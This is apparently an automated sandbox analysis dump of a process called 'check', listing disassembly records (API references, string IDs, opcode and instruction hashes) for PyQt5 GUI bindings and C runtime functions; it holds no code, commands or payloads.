                                                                                                                                                                                                                                          • Instruction ID: 76d1c54dea477f86bde49517f37a571a72ed9e8f794a92c33574bce65257b9b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 274df547a1825b7ddfb6c487d78f0caf85213a4b21e9e1c727d660c06faae4c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F012D37A08A46D1EB108F15E8892A933A4FB84FD4F914032DA8E03320EF7CE56AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?visibility@Visibility@1@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$visibility$visibility(self) -> QWindow.Visibility
                                                                                                                                                                                                                                          • API String ID: 4088591007-1278614163
                                                                                                                                                                                                                                          • Opcode ID: 5eb2c943aec9a995212ce031557793b3a03a24613a502bbf37782702e2a39408
                                                                                                                                                                                                                                          • Instruction ID: 4bb2ef44a8914da5eb3abe0f12d30962285a2d6c197b130c06bb5cbe9d05e1b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb2c943aec9a995212ce031557793b3a03a24613a502bbf37782702e2a39408
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01ED37A09A46D1EB109F15E8496A933A4FB44FD4F914032CA9E47330EF7DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?nativeOrientation@QScreen@@QEBA?AW4ScreenOrientation@Qt@@XZ.QT5GUI ref: 00007FF89D969DAB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Orientation@$?nativeQt@@ScreenScreen@@
                                                                                                                                                                                                                                          • String ID: QScreen$nativeOrientation$nativeOrientation(self) -> Qt.ScreenOrientation
                                                                                                                                                                                                                                          • API String ID: 3792427072-1851680853
                                                                                                                                                                                                                                          • Opcode ID: edc79f3ecc34f9eea69f28605863bf7f32773241f612082dac7cc7bd0a0cadf1
                                                                                                                                                                                                                                          • Instruction ID: ce62e2fc01afa03a6b8eeb264a934481bdf2fb47a02889de826f548aa3845985
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edc79f3ecc34f9eea69f28605863bf7f32773241f612082dac7cc7bd0a0cadf1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B501E976A08A46C1EB109F65E8896A933A8FB54FD4F918032DA9E43320EF7DF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: QTextOption$useDesignMetrics$useDesignMetrics(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2610644205-2644750750
                                                                                                                                                                                                                                          • Opcode ID: d248faae69c860b4fe41775bb58a5bc7df6ad01d805deca51f9da0dbde0ea471
                                                                                                                                                                                                                                          • Instruction ID: 1cb8f5d7324924d1b892e7d540af04a99fe1ff0f15aaed7b7a3278e83ae777b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d248faae69c860b4fe41775bb58a5bc7df6ad01d805deca51f9da0dbde0ea471
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B012C36A08B46D1DB10DF51E8896A933A4FB44F94F914032CA9E07320EF7DE559C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?create@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$create$create(self)
                                                                                                                                                                                                                                          • API String ID: 1733840589-1948277933
                                                                                                                                                                                                                                          • Opcode ID: cada4c10d51697eae09278391e6f499017bc0fb5d0ab38c45172874949b078b5
                                                                                                                                                                                                                                          • Instruction ID: 4cb1d37d12e814526c258f4f133d330f526d6df58bd472043a3174827836bfaa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cada4c10d51697eae09278391e6f499017bc0fb5d0ab38c45172874949b078b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5010C76A08B4AD1EB108F15E8896A933A4FB54FD4F918432DA9E03330EF7DE55AC344
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?normalize@Quaternion@@
                                                                                                                                                                                                                                          • String ID: QQuaternion$normalize$normalize(self)
                                                                                                                                                                                                                                          • API String ID: 2138399658-1567478307
                                                                                                                                                                                                                                          • Opcode ID: c25daf945695b95002e533e0bc4ff6a68738ef6d4053f3c136a98db885c97653
                                                                                                                                                                                                                                          • Instruction ID: 209cfbb156e77bfe7be390cd5a6d2efa03753976a204c4d0546f17645bd6b418
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c25daf945695b95002e533e0bc4ff6a68738ef6d4053f3c136a98db885c97653
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA01E976A08B4AD1EB20CF51E8896A933A4FB44FD4F914032DA8E03320EF7DE55AC344
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?cancel@Manager@@Session
                                                                                                                                                                                                                                          • String ID: QSessionManager$cancel$cancel(self)
                                                                                                                                                                                                                                          • API String ID: 2497595591-1928775329
                                                                                                                                                                                                                                          • Opcode ID: 512c3fdde8e8df44e63be66183acb02c20dbd308cb2f163f1bc8ffa3616b837c
                                                                                                                                                                                                                                          • Instruction ID: 1626045166371aa2896c77fbbb757ee3f9f749478e44c4c79856251836828a90
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512c3fdde8e8df44e63be66183acb02c20dbd308cb2f163f1bc8ffa3616b837c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44010C76A08A46D1EB108F11E8896A933B4FB54FD4F914032DA9E43330EF7DE56AC344
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                                          • String ID: QPixelFormat$yellowSize$yellowSize(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3417993445-1855945841
                                                                                                                                                                                                                                          • Opcode ID: d1d026f33e6f52d6689f92b7680a0c7de75ace86ee87d572ea93ca2cf876744a
                                                                                                                                                                                                                                          • Instruction ID: 17c7665b27cf0a97dd19e0e3d98f460ed860dcb3fbf41c55565d040f547b3591
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1d026f33e6f52d6689f92b7680a0c7de75ace86ee87d572ea93ca2cf876744a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D012C37A08B86D2EB10DF64E8496A933A4FB44F94F914032DA9E07320EF7CE659C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clear@PainterPath@@
                                                                                                                                                                                                                                          • String ID: QPainterPath$clear$clear(self)
                                                                                                                                                                                                                                          • API String ID: 3640657333-838751274
                                                                                                                                                                                                                                          • Opcode ID: 120f90b1bbaed5862c67495ae71e4ec66c86e47f16c95164ae550b63e61d5bfb
                                                                                                                                                                                                                                          • Instruction ID: 6f224ca2033b562b82574a18f2b03ed403a87280727cdd06df649b4d71be48af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 120f90b1bbaed5862c67495ae71e4ec66c86e47f16c95164ae550b63e61d5bfb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E801E976A08A4AD1EB10CF11E8896A933A4FB54FD4F914432DA8E03320EF7DE55AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_
                                                                                                                                                                                                                                          • String ID: QPolygon$size$size(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2938811853-4270133733
                                                                                                                                                                                                                                          • Opcode ID: e55a661093e2a40203f03b537055c5fec65fa7ffb7e5bf3865f5e0c7259b5645
                                                                                                                                                                                                                                          • Instruction ID: f51504a3cd26e5e496101dcc6f854eb3502c9b8282edad403e6274d2ea066a7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e55a661093e2a40203f03b537055c5fec65fa7ffb7e5bf3865f5e0c7259b5645
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B010C36A05A4AC1DB10CF11E8896A933A4FB44F94F914032DA8E03320EF7DE559C784
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QTransform$m33$m33(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-641805950
                                                                                                                                                                                                                                          • Opcode ID: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
                                                                                                                                                                                                                                          • Instruction ID: caad999819366d19ffe03a7bea964ed8d2902fd66446cc2646b5a53931f2334b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F011A36A08F46D1EB10DF65E8496A933A4FB44BD4F918032DA9E03320EF7DEA59C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDefaultFormat@Format@@SurfaceV1@@
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setDefaultFormat$setDefaultFormat(format: QSurfaceFormat)
                                                                                                                                                                                                                                          • API String ID: 917215825-526822657
                                                                                                                                                                                                                                          • Opcode ID: 4d6aae18cff6c263698ee678d931226eb1ed501da37811969cc8a527e470f1d9
                                                                                                                                                                                                                                          • Instruction ID: df6f5096ab99f300b52527a1d798da7518367701365a2d98e1f565aee3f51024
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d6aae18cff6c263698ee678d931226eb1ed501da37811969cc8a527e470f1d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A01A176A08A86D1EA209F51E8452A573B0FB94FD4F804032E98E57734EF7CF159C748
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clear@Cache@@Pixmap
                                                                                                                                                                                                                                          • String ID: QPixmapCache$clear$clear()
                                                                                                                                                                                                                                          • API String ID: 3699800772-2669739335
                                                                                                                                                                                                                                          • Opcode ID: 2f0b2d589a30ebcd163192d472fb86fa0997706b85f5c24c82bbb6408e528cf9
                                                                                                                                                                                                                                          • Instruction ID: 5497cfe8833737fdd6ab53e3e10a06e663625a3b4a8f3c6cd632f1d1b73cda77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0b2d589a30ebcd163192d472fb86fa0997706b85f5c24c82bbb6408e528cf9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54F0FF36A09A47D2EA209B51E8852A523B0FB58F89FC04432DA8F43720EF3CF169C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                          • Instruction ID: c2b17bb5ae86e995ec78ecd07b21b463e77b5dda114a34ace26746e77f99f1f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62513772F04A118BEB14EF649DD56BCB761AB44378F900275DD1D52AE4EF7CA40ACB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA220A
                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA2228
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                          • API String ID: 1114863663-87138338
                                                                                                                                                                                                                                          • Opcode ID: b82a69353089fb67708d77c7baffa59225a8d2ade895b0ace0a94b2f11093c47
                                                                                                                                                                                                                                          • Instruction ID: 054c8d56889412a2b50411b353dfdc73be794a212faed2d443735ff96da8acbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82a69353089fb67708d77c7baffa59225a8d2ade895b0ace0a94b2f11093c47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31BF72728B4186DB348F19E4806A9BB52FB84BE8F444230FAD947AD9DB3CE5018B50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F19
                                                                                                                                                                                                                                          • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F2F
                                                                                                                                                                                                                                          • ??0QTextCursor@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F8F
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F9D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Array$?allocate@AllocationData@@Data@@@@@Flags@Option@U1@_V0@@$Cursor@@Font@@Text
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3532179901-0
                                                                                                                                                                                                                                          • Opcode ID: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
                                                                                                                                                                                                                                          • Instruction ID: 88d0b10bbaecb4968586676c8c5818eff65fb5b4e893d4aa79f815a4091f475e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99319833705A45C2EA20DF5AE84426CB7B0F788FC4B958126DE8E07764EF39E496C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2744629635.00007FF89E7B1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF89E7B0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89e7b0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
                                                                                                                                                                                                                                          • Instruction ID: 7460ebded5764dc4fd50d0b5180003e8b9a5cf2ef1fb2165514395b8dd1b0276
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D117C22B15F018AEB10CF60E8852B837A4FB19B98F041E35EA6D467A8DF3CE159C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                          • Instruction ID: 518ee419c0478ba603cc176aa3a42230cf82864d3d25eb0a828feba6219a7c5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D112126B14F0589FB20CF64E8942B837A4FB19B98F441D31EA6D47794EF7CE1948350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                          • Instruction ID: 246698f8ec1c2415241ea0e369f02d1ec9127c2bf402482d6056af7218835a6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3441F922B08A8245F764AF25E4C1379E750EB80BB8F984275EE5D06BD5DFBCD449C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J1
                                                                                                                                                                                                                                          • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                                          • Opcode ID: 27990ee7403c79c142b31b2cc555c8cda5b2aa7adf30d3b8b6cf83de5ac767ac
                                                                                                                                                                                                                                          • Instruction ID: e734a01170bae9801be05d15b73aed72e9f149a5549510064a96ddc4b21a3913
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27990ee7403c79c142b31b2cc555c8cda5b2aa7adf30d3b8b6cf83de5ac767ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D212177A1AB4282EA219F15E44416973A5FB84FD0F544032EE8E03764EF3CF556CB48
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J1
                                                                                                                                                                                                                                          • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                                          • Opcode ID: 4c5d885e5b98b9309153a1595660f37682bc99f760a0fd2b80c6663f2353cabd
                                                                                                                                                                                                                                          • Instruction ID: ef1c91a23f71bcfc872b1e79af5fbd3f5ae14bc9e0f305c1c0ddd719af843d7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c5d885e5b98b9309153a1595660f37682bc99f760a0fd2b80c6663f2353cabd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8121E777A09B4286EA218F16E44416963A4FB88FE4F444132EE8E03764EF3CF5568B44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?append@?$DeallocF@@@F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: J9J1
                                                                                                                                                                                                                                          • API String ID: 276404354-2770280175
                                                                                                                                                                                                                                          • Opcode ID: 09de65b96e4e4f67c5fdd5c86f91cd834e4eb0600a0c0cbad9ad6902e96cc110
                                                                                                                                                                                                                                          • Instruction ID: f6901512257e783efdd17fd4b14b725a50d66a6d23d72bd13cf563476e40fdd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09de65b96e4e4f67c5fdd5c86f91cd834e4eb0600a0c0cbad9ad6902e96cc110
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1314837B09B45C2DB618B15E8882A973A4FB48FD0F554136DE9E83724EF38E494C704
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?createDocument@@Font@@Format@@@Object@Object@@V0@@
                                                                                                                                                                                                                                          • String ID: createObject
                                                                                                                                                                                                                                          • API String ID: 2532943642-299252263
                                                                                                                                                                                                                                          • Opcode ID: 52e45fd438f384f9dc00094440b7b9f97ab3eb64d2c4cf26df03f1e967ac2c2c
